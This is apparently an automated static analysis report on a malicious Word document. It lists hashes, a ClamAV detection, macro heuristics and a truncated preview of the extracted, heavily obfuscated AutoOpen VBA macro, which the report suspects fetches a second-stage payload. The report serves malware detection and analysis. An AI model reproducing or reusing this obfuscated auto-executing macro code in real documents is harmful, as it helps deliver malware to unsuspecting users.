Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b3eb13fb68b2dd06…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 166.6 KB
Created: 2019-04-25 09:26:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 3587bf0d004464548660d42e42539d93
SHA-1: 385769206456596a6441eb8c59dc5499ae79efab
SHA-256: b3eb13fb68b2dd06dc7ff59e33ab72db682a967d187a780318b91cd41748d263
Risk Score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is identified as malicious by ClamAV and exhibits high-severity heuristics indicating the presence of an AutoOpen VBA macro that uses GetObject for execution. The VBA script itself is heavily obfuscated but its structure suggests it is designed to execute code, likely to download and run a second-stage payload. No specific family could be confidently identified.

Heuristics (7)

  • ClamAV: Doc.Malware.Dvwf-6956245-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Dvwf-6956245-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • GetObject call [high] (OLE_VBA_GETOBJ)
    GetObject call
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 25546 bytes
SHA-256: 042bb826fc2e80b80c7499812e5403287d0a004f5dc1c6d08f117da1b5f06e6f

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "OAAAZC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "wQDCAcC"
Attribute VB_Base = "0{EC36BAE5-7ADE-4F95-B004-CE1957793634}{5B1E76E0-9352-4FC3-AED8-71E38191B46E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "I4XAUBBZ"
Attribute VB_Base = "0{C824A8E8-B0A3-406D-9B48-F91A9EA68976}{0778C759-CC9F-4601-AD3A-CD781E9CA4CB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "dBACAAA1"
Sub autoopen()
   If v_AQQCBc = kZABkQA Then
ElseIf u_UAUCA = mxBDXA Then
            s4ACxUA = Atn(454565679)
ElseIf YCkkooQ = LUxBQ41 Then
            uA1UA_GQ = Int(999281804)
ElseIf oA4Q1QAX = j1GQAA Then
End If
   If LQX4BAA = iAABBABQ Then
ElseIf m_4AUBAA = hUAAZB Then
            b_QUAX = Atn(430765672)
ElseIf jwDAAD = t4xAxAQo Then
            KcUDcU = Int(727024415)
ElseIf MxGA1D_A = qXxDc4 Then
End If
   If UQcoCA = ZXAUGD Then
ElseIf KAZUBAB = ZAUUAk Then
            ZA1AQB_ = Atn(632069907)
ElseIf IACDXDA = FZGDAAQA Then
            jAA_AXx = Int(911954614)
ElseIf QxDAoG4A = AAAw_c Then
End If
c4DDUC
   If wABAQQ = iDQkAw Then
ElseIf VQD1UU_ = tZUXBDBA Then
            nAXkDD1A = Atn(39628240)
ElseIf hAAAcxXZ = j_QAAB Then
            mCBA1G = Int(53483851)
ElseIf zCA1AXA = XC4AAA Then
End If
   If lABXZQ = AAAABA Then
ElseIf MUBkQD = YGQBDBG Then
            LoAAAUkA = Atn(70914249)
ElseIf ADACAA = sAD4UXA Then
            bAAwAc = Int(631660017)
ElseIf ToG_QU = SDQBQAcA Then
End If
End Sub
Function XXxX4Dw(mQoADc)
   If MAA4A4G = zDCcQA Then
ElseIf VoA1ABB = MDQBAA Then
            aACDxXG = Atn(903441126)
ElseIf rA11AAoB = PcDUAXD Then
            TBB4_AA = Int(374880229)
ElseIf lDUDAxx = j4c1ZQwQ Then
End If
   If UUAAU_ = f1QUAo Then
ElseIf t4oAcZ = twGAAADB Then
            IZw4oAUA = Atn(324071606)
ElseIf SAc11AA = BAAAQXAA Then
            LGcAUAAA = Int(711569659)
ElseIf rXoAQcU4 = CUABA4A Then
End If
Set XXxX4Dw = CVar(mQoADc)
   If YAQG_w = wAADcA Then
ElseIf pXQAo_G = uAGA4AAZ Then
            pAAAACo = Atn(806537656)
ElseIf U1UA_B = BXxGDG Then
            rwDAXBBQ = Int(875458927)
ElseIf H1DcAD = ixQ4QBU Then
End If
   If pkBoxZGA = QAA4D1kQ Then
ElseIf VBXAAcoU = ickQDAA Then
            HXX1Dk = Atn(396828347)
ElseIf CAowAAU = WkxA1UAA Then
            jQXAQQ = Int(397614101)
ElseIf cBADDD = mDX1AkAU Then
End If
End Function

Attribute VB_Name = "v_oDAA1"
Function c4DDUC()
On Error Resume Next
   If TADxxoB = wGU1Qo Then
ElseIf XUZBA1A = AQA1Q1Z Then
            WAcQQ_Bc = Atn(902672992)
ElseIf uA4_c4 = BAAA_ABx Then
            WUoc4_GA = Int(685590749)
ElseIf lDUQ1_ = k1AAG1BU Then
End If
   If cDAUAABA = IAcUAZG Then
ElseIf TA4ADQ = zCQQADw Then
            dxAXkoDZ = Atn(512946224)
ElseIf OZAoAA = wQDXQBAX Then
            SwAXAAGC = Int(918804106)
ElseIf NABGA1_A = EA111wB Then
End If
If 5072 < 19851 Then
tA_QAB4w = vbFalse
   If qGAAwowB = iCGAQBZ Then
ElseIf b1XAwU = n_GAAAc Then
            NooAGwcC = Atn(996313995)
ElseIf UBxUAwB = MUXBA_D Then
            oAUUx1A = Int(645588906)
ElseIf EX_wGQAX = fBAQQZBG Then
End If
   If jUAAGUoc = v44GACQ Then
ElseIf J1GDXACQ = LAAwAAA Then
            Y4AA_AA = Atn(887414397)
ElseIf UCCAQA = fQcAAk Then
            iDDXAcBo = Int(141127305)
ElseIf AXXAXGD = OZxZQwQB Then
End If
   If wAAADDQ = Aw4wQDA Then
ElseIf PAAZADU = tBGDwB4 Then
            nAAUDAA = Atn(51129147)
ElseIf FCxAw4A = YxABDUAA Then
            BQABBZUA = Int(578241693)
ElseIf txAA4ABA = IwA_QcU 
... (truncated)